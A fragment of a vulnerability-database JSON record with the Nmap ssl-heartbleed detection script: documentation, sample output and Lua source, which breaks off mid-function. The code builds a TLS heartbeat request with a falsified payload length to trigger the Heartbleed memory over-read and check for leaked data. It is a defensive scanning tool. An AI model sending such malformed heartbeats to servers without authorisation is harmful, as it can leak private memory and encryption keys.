"href": "https://jira.atlassian.com/browse/JRACLOUD-38927", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nmap": [{"lastseen": "2018-11-07T16:36:18", "references": [], "description": "Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)\n\n## Script Arguments \n\n#### ssl-heartbleed.protocols \n\n(default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -p 443 --script ssl-heartbleed <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 443/tcp open https\n | ssl-heartbleed:\n | VULNERABLE:\n | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n | State: VULNERABLE\n | Risk factor: High\n | Description:\n | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n |\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n | http://www.openssl.org/news/secadv_20140407.txt\n |_ http://cvedetails.com/cve/2014-0160/\n \n \n\n## Requires \n\n * match\n * nmap\n * shortport\n * sslcert\n * stdnse\n * string\n * tableaux\n * vulns\n * tls\n\n* * *\n", "edition": 13, "reporter": "Patrik Karlsson <patrik@cqure.net>", "published": "2014-04-09T01:49:29", "title": "ssl-heartbleed NSE Script", "type": "nmap", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-11-06T15:07:01", "id": "NMAP:SSL-HEARTBLEED.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-heartbleed.html", "sourceData": "local match = require('match')\nlocal nmap = require('nmap')\nlocal shortport = require('shortport')\nlocal sslcert = require('sslcert')\nlocal stdnse = require('stdnse')\nlocal string = require \"string\"\nlocal tableaux = require \"tableaux\"\nlocal vulns = require('vulns')\nlocal have_tls, tls = pcall(require,'tls')\nassert(have_tls, \"This script requires the tls.lua library from https://nmap.org/nsedoc/lib/tls.html\")\n\ndescription = [[\nDetects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160).\nThe code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)\n]]\n\n---\n-- @usage\n-- nmap -p 443 --script ssl-heartbleed <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open https\n-- | ssl-heartbleed:\n-- | VULNERABLE:\n-- | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n-- | State: VULNERABLE\n-- | Risk factor: High\n-- | Description:\n-- | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n-- |\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n-- | http://www.openssl.org/news/secadv_20140407.txt\n-- |_ http://cvedetails.com/cve/2014-0160/\n--\n--\n-- @args ssl-heartbleed.protocols (default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n--\n\nauthor = \"Patrik Karlsson <patrik@cqure.net>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"vuln\", \"safe\" }\ndependencies = {\"https-redirect\"}\n\nlocal arg_protocols = stdnse.get_script_args(SCRIPT_NAME .. \".protocols\") or {'TLSv1.0', 'TLSv1.1', 'TLSv1.2'}\n\nportrule = function(host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function recvhdr(s)\n local status, hdr = s:receive_buf(match.numbytes(5), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record header - server closed connection')\n return\n end\n local typ, ver, ln = string.unpack('>B I2 I2', hdr)\n return status, typ, ver, ln\nend\n\nlocal function recvmsg(s, len)\n local status, pay = s:receive_buf(match.numbytes(len), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record payload - server closed connection')\n return\n end\n return true, pay\nend\n\nlocal function testversion(host, port, version)\n\n local hello = tls.client_hello({\n [\"protocol\"] = version,\n -- Claim to support every cipher\n -- Doesn't work with IIS, but IIS isn't vulnerable\n [\"ciphers\"] = tableaux.keys(tls.CIPHERS),\n [\"compressors\"] = {\"NULL\"},\n [\"extensions\"] = {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n [\"heartbeat\"] = \"\\x01\", -- peer_not_allowed_to_send\n },\n })\n\n local payload = \"Nmap ssl-heartbleed\"\n local hb = tls.record_write(\"heartbeat\", version, string.pack(\"B>I2\",\n 1, -- HeartbeatMessageType heartbeat_request\n 0x4000) -- payload length (falsified)\n -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet\n -- header + 1 to overflow\n .. payload -- less than payload length.\n )\n\n local status, s, err\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, s = specialized(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", s)\n return\n end\n else\n s = nmap.new_socket()\n status, err = s:connect(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", err)\n return\n end\n end\n\n s:set_timeout(5000)\n\n -- Send Client Hello to the target server\n status, err = s:send(hello)\n if not status then\n stdnse.debug1(\"Couldn't send Client Hello: %s\", err)\n s:close()\n return nil\n end\n\n -- Read response\n local done = false\n local supported = false\n local i = 1\n local response\n repeat\n status, response, err = tls.record_buffer(s, response, i)\n if err == \"TIMEOUT\" then\n -- Timed out while waiting for server_hello_done\n -- Could be client certificate required or other message required\n -- Let's just drop out and try sending the heartbeat anyway.\n done = true\n break\n elseif not status then\n stdnse.debug1(\"Couldn't receive: %s\", err)\n s:close()\n return nil\n end\n\n local record\n i, record = tls.record_read(response, i)\n if record == nil then\n stdnse.debug1(\"Unknown response from server\")\n s:close()\n return nil\n elseif record.protocol ~= version then\n stdnse.debug1(\"Protocol version mismatch\")\n s:close()\n return nil\n end\n\n if record.type == \"handshake\" then\n for _, body in ipairs(record.body) do\n if body.type == \"server_hello\" then\n if body.extensions and body.extensions[\"heartbeat\"] == \"\\x01\" then\n supported = true\n end\n elseif body.type == \"server_hello_done\" then\n stdnse.debug1(\"we're done!\")\n done = true\n end\n end\n end\n until done\n if not supported then\n stdnse.debug1(\"Server does not support TLS Heartbeat Requests.\")\n s:close()\n return nil\n end\n\n status, err = s:send(hb)\n if not status then\n stdnse.debug1(\"Couldn't send heartbeat request: %s\", err)\n s:close()\n return nil\n end\n while(true) do\n local status, typ, ver, len = recvhdr(s)\n if not status then\n stdnse.debug1('No heartbeat response received, server likely not vulnerable')\n break\n end\n if typ == 24 then\n local pay\n status, pay = recvmsg(s, 0x0fe9)\n s:close()\n if #pay > 3 then\n return true\n else\n stdnse.debug1('Server processed malformed heartbeat, but did not return any extra data.')\n break\n end\n elseif typ == 21 then\n stdnse.debug1('Server returned error, likely not vulnerable')\n break\n end\n end\n\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\",\n state = vulns.STATE.NOT_VULN,\n
